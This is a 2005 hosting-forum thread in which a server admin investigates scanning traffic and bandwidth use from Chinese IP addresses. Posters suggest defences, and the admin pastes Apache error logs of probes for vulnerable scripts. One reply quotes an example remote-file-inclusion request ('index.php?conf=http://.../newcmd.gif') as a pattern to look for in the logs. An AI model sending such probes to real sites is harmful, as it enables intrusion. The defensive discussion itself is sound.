Results 1 to 13 of 13
  1. #1
    Join Date
    Nov 2004
    Location
    Marietta PA
    Posts
    137

    Odd page visits and large hit count

    Over the last few day I have noticed that my visits from china have greatly increased which is never a good thing (no offense to any one from that area).

    In awastat section where it shows you the most pages visit I am seeing page hits for urls on other servers instead. 99% of these links lead to a prxjdg - created by PRX4EVER with site address http://prx4ever.virtualave.net/ps/ (the link no longer exists).

    I have attached a screen shot of the awastats.

    What ever this is it has eaten up 200 mb of bw over night which not a big deal currently.

    I have ran rkhunter and chrootkit and both give a clean bill of health
    the netstat output does not show any weird ports open though it shoulws about 50 china ip addresses conencted to my ip via port 80.

    My website (not the hosting one) shows a who is online count of over 100 users lately.

    Now the site I mention is running mambo 4.5.2.1 it is also the firs site that was added to our cpanel server so I see hits for the other domains soem times in our logs. IE people going to whois.sc for another domain on the server shows up in my awastats.

    The server is fedora core 2 protected with apf firewall.

    I dont know if this is a new attack casue I just saw it start up on the 1st of june. I have checked server logs and do not see anything weird the temp dir has the t bit and there is nothing hidden in there.

    If any one has any thought on this please give us a shout or post in here.

    Oh yeah and tcpdump and ethereal do not show any strange traffic on the nic. though I see many repeat hits from the same ips on port 80 some times a few 100 at a time.
    Attached Files Attached Files
    Digital Offensive
    http://www.digitaloffensive.com
    Take an offensive approach to Security know what your foes know!

  2. #2
    Join Date
    Nov 2004
    Location
    Marietta PA
    Posts
    137
    Digital Offensive
    http://www.digitaloffensive.com
    Take an offensive approach to Security know what your foes know!

  3. #3
    Join Date
    Oct 2004
    Posts
    133
    Browse through the account`s folders.
    See if there are any unusual files.
    It is possible that somebody hopes to exceed the bandwidth for this site. This is just a suggestion and a possible reason.

    The lack of logical reason for this is even more disturbing.
    I believe you would have felt better if you did find something.
    If there is nothing, absolutely nothing strange, my guess is that
    somebody wishes to force bandwidth exceeding.

    I hope that somebody will manage to help you.

  4. #4
    Join Date
    Nov 2004
    Location
    Marietta PA
    Posts
    137
    Arny thanks, I am not worrying about the bw, but you are right I would of felt better if the logs showed soemthing or if there was a trojan found. I have 2000 gb to use and the server with all the sites on it has never broken 20 gb.
    Digital Offensive
    http://www.digitaloffensive.com
    Take an offensive approach to Security know what your foes know!

  5. #5
    Join Date
    Dec 2004
    Posts
    223
    Have you enabled hotlink protection?? Other domains can steal your bandwidth that way..

  6. #6
    Join Date
    Dec 2004
    Posts
    223
    Also you could disable directory indexing for the folders which neednt be accessed using urls..

  7. #7
    Join Date
    Nov 2004
    Location
    Marietta PA
    Posts
    137
    no I havent but I can do that, the issue though I dont think they are linking to my files especaially since all the links involved are proxy checkign servers.

    Though thanks for the tip.
    Digital Offensive
    http://www.digitaloffensive.com
    Take an offensive approach to Security know what your foes know!

  8. #8
    Join Date
    Dec 2004
    Posts
    223
    Do you have mod_security installed?? You can set up custom filters to stop access to other urls using your domain in the browser.. Check for apache/domlogs for this domain and you should be able to see entries like..

    ...GET /index.php?conf=http://www.domain.com/.../newcmd.gif.....

    something like this.

    Check if these are from a prticular IP.

  9. #9
    Join Date
    Oct 2004
    Posts
    133
    And if they are from particular IP addresses or whole IP range, I`m thinking for one nice IP ban.

  10. #10
    Join Date
    Nov 2004
    Location
    Marietta PA
    Posts
    137
    Yeah iam thinking of blocking china for a few days.
    Digital Offensive
    http://www.digitaloffensive.com
    Take an offensive approach to Security know what your foes know!

  11. #11
    Join Date
    Nov 2004
    Location
    Marietta PA
    Posts
    137
    Here is more info, looks like all the scripts these people are looking for dont exist though I already new that. I guess there is a new hack out there search for vuln scripts:

    Jun 3 11:04:56 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:56 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:04:34 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:34 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:04:31 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:31 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/~mana_/prxjdg.cgi
    [Fri Jun 3 11:04:28 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:28 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:04:18 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:18 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
    [Fri Jun 3 11:04:14 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:14 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:04:13 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:13 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
    [Fri Jun 3 11:04:11 2005] [error] [client 218.56.238.75] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:11 2005] [error] [client 218.56.238.75] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:04:06 2005] [error] [client 218.56.238.75] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:06 2005] [error] [client 218.56.238.75] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:56 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:56 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
    [Fri Jun 3 11:03:53 2005] [error] [client 218.56.239.72] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:53 2005] [error] [client 218.56.239.72] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:39 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:39 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:32 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:32 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
    [Fri Jun 3 11:03:28 2005] [error] [client 218.56.239.72] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:28 2005] [error] [client 218.56.239.72] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:27 2005] [error] [client 218.56.232.152] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:27 2005] [error] [client 218.56.232.152] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:25 2005] [error] [client 218.56.239.32] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:25 2005] [error] [client 218.56.239.32] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:04 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:04 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
    [Fri Jun 3 11:02:44 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:02:44 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:02:32 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:02:32 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:02:28 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:02:28 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:02:09 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:02:09 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
    [Fri Jun 3 11:02:07 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:02:07 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi

    As you can see they are all china ips. Which now have been blocked.
    Digital Offensive
    http://www.digitaloffensive.com
    Take an offensive approach to Security know what your foes know!

  12. #12
    Join Date
    Dec 2004
    Posts
    223
    As you've blocked those IPs, do you still have issues?

  13. #13
    Join Date
    Nov 2004
    Location
    Marietta PA
    Posts
    137
    I installed bfd last night nad it has block several 100 china ips
    Digital Offensive
    http://www.digitaloffensive.com
    Take an offensive approach to Security know what your foes know!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •